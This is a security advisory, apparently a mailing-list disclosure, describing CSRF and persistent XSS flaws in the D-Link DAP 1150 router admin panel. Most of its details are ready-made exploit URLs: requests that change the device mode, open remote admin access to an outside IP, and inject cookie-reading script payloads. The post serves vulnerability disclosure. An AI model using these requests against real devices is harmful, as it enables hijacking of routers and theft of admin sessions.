Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150

Hello 3APA3A!

In 2011 and beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens). That time I wrote about vulnerabilities in admin panel in Access Point mode and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

SecurityVulns ID: 12076.

---

Affected products:

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn't fix them.

---

Details:

I remind you, that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in login form and other vulnerabilities, which allow to remotely log into admin panel for conducting CSRF and XSS attacks inside admin panel.

CSRF (WASC-09):

In section Advanced / Device via CSRF it's possible to change device mode. If access point mode is on, then for attack on vulnerabilities in router mode it's needed to turn on this mode.

Turn on access point mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0

Turn on router mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0

CSRF (WASC-09):

In section Advanced / Remote access via CSRF it's possible to add, edit and delete settings of remote access to web interface. The next request will allow remote access to admin panel from IP 50.50.50.50.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0

XSS (WASC-08):

These are persistent XSS. The code will execute in section Advanced / Remote access.

Attack via add function in parameter res_buf (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Attack via edit function in parameter res_buf (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7137/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua